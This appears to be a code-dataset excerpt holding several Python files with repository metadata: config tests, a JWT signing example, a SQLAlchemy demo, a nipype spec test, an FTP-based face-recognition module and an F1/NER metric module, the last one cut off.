EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| true | true |
f72eb0729c8579621c30a4f80dbbabfa81283a19 | 99 | py | Python | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| 33 | 78 | 0.777778 | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| true | true |
f72eb080d6a45bd70ccbae966aa6a0f3c15c3a83 | 585 | py | Python | app/rsa.py | FusionAuth/-fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | 2 | 2022-01-04T15:52:31.000Z | 2022-02-01T12:23:10.000Z | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
# User API
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
# Todo API
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| 22.5 | 82 | 0.601709 | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| true | true |
f72eb0fe13ca1abff84f6656134223f774bee5b5 | 3,510 | py | Python | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
# Retrieving the inverse of the relationship. Notice I reverse the Person and Address to load the Address table
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
# showing how to use the print function with printing text and data at the same time easily
print(f'{address.person.name} has a postal code of {address.post_code}')
| 36.5625 | 131 | 0.759829 | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
print(f'{address.person.name} has a postal code of {address.post_code}')
| true | true |
f72eb2bdfe5df62c8e4ef216181ab120564060ca | 934 | py | Python | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 2 | 2017-10-05T21:08:38.000Z | 2018-10-09T23:01:23.000Z | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 1 | 2016-10-11T19:18:53.000Z | 2016-10-11T19:18:53.000Z | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 28.30303 | 78 | 0.679872 |
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| true | true |
f72eb2f1472da936493f1cf75785a6413c1e7e61 | 7,405 | py | Python | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | 1 | 2021-06-24T07:57:40.000Z | 2021-06-24T07:57:40.000Z | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
# START # Establish the output access credential and folder # START #
output_pin_name: str = 'Output'
if output_pin_name not in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
# STOP # Establish output credentials and folder # STOP #
logger.info('connecting to input ftp server: ' + input_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
# START # process and send files # START #
logger.info('changing ftp working directory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
# Save the image locally
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
# Mark faces and save the image
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
# Send file to ftp
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close() # close file and FTP
input_ftp.cwd(input_folder)
# STOP # process and send files # STOP #
input_ftp.quit()
if output_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| 45.709877 | 118 | 0.640648 | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
t in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
nput_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
irectory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close()
input_ftp.cwd(input_folder)
ut_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| true | true |
f72eb3531991a856678c5e8125ca3770d94382aa | 6,355 | py | Python | UNF/training/metric.py | waterzxj/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 86 | 2020-02-23T13:38:11.000Z | 2022-03-01T12:09:28.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 2 | 2020-04-20T08:33:05.000Z | 2020-05-13T13:43:08.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 14 | 2020-03-07T05:21:44.000Z | 2021-05-09T16:57:23.000Z | #coding:utf-8
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
raise NotImplementedError
def get_metric(self, reset=False):
"""
返回metric的指标
"""
raise NotImplementedError
def reset(self):
"""
重置内部状态
"""
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
"""
把tensor安全的copy到cpu进行操作,避免gpu的oom
"""
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
"""
准确率、召回率、F值的评价指标
"""
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
# True Negatives: correct non-positive predictions.
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
# True Positives: correct positively labeled predictions.
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
# False Negatives: incorrect negatively labeled predictions.
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
# False Positives: incorrect positively labeled predictions
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
"""
返回准确率、召回率、F值评价指标
"""
# print('TP',self._true_positives,'TN',self._true_negatives,'FP',self._false_positives,'FN',self._false_negatives)
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
"""
重置内部状态
"""
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
"""
返回metric的指标
"""
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| 32.09596 | 122 | 0.59465 |
import torch
from learner_util import get_ner_BIO
class Metric(object):
    """Base interface for streaming evaluation metrics.

    Subclasses accumulate statistics batch-by-batch through ``__call__`` and
    report them through ``get_metric``; ``reset`` clears the accumulated state.
    """

    def __call__(self, predictions, gold_labels, mask=None):
        """Accumulate statistics for one batch; must be overridden."""
        raise NotImplementedError

    def get_metric(self, reset=False):
        """Return the metric value(s); must be overridden."""
        raise NotImplementedError

    def reset(self):
        """Clear accumulated state; must be overridden."""
        raise NotImplementedError

    @staticmethod
    def unwrap_to_tensors(*tensors):
        """Lazily detach every torch.Tensor argument and move it to the CPU.

        Non-tensor arguments (e.g. None) pass through untouched.  Returns a
        generator yielding items in the same order as the inputs.
        """
        def _to_host(item):
            if isinstance(item, torch.Tensor):
                return item.detach().cpu()
            return item
        return (_to_host(item) for item in tensors)

    @classmethod
    def from_option(cls, conf):
        """Build an instance from a configuration mapping (keys become kwargs)."""
        return cls(**conf)
class F1Measure(Metric):
    """Precision/recall/F1 for a single positive class, accumulated over batches."""

    def __init__(self, positive_label):
        super(F1Measure, self).__init__()
        # Integer id of the class treated as "positive"; every other class is negative.
        self._positive_label = positive_label
        self._true_positives = 0.0
        self._true_negatives = 0.0
        self._false_positives = 0.0
        self._false_negatives = 0.0

    def __call__(self, predictions, gold_labels, mask=None):
        """Accumulate confusion counts for one batch.

        :param predictions: tensor of class scores whose last dimension indexes classes
        :param gold_labels: tensor of gold class ids
        :param mask: optional tensor; zero entries are excluded from the counts
        """
        predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
        num_classes = predictions.size(-1)
        if (gold_labels >= num_classes).any():
            raise Exception("A gold label passed to F1Measure contains an id >= {}, "
                            "the number of classes.".format(num_classes))
        if mask is None:
            mask = torch.ones_like(gold_labels)
        mask = mask.float()
        gold_labels = gold_labels.float()
        self.update(predictions, gold_labels, mask)

    def update(self, predictions, gold_labels, mask):
        """Fold one batch into the running confusion counters."""
        is_positive = gold_labels.eq(self._positive_label).float()
        is_negative = 1.0 - is_positive
        # Hard prediction = argmax over the class dimension.
        predicted = predictions.max(-1)[1].float().squeeze(-1)
        hits_positive = (predicted == self._positive_label).float()
        misses_positive = (predicted != self._positive_label).float()
        self._true_negatives += (misses_positive * is_negative * mask).sum()
        self._true_positives += (hits_positive * is_positive * mask).sum()
        self._false_negatives += (misses_positive * is_positive * mask).sum()
        self._false_positives += (hits_positive * is_negative * mask).sum()

    def get_metric(self, reset=False):
        """Return precision, recall and F1 (epsilon-stabilised to avoid 0/0)."""
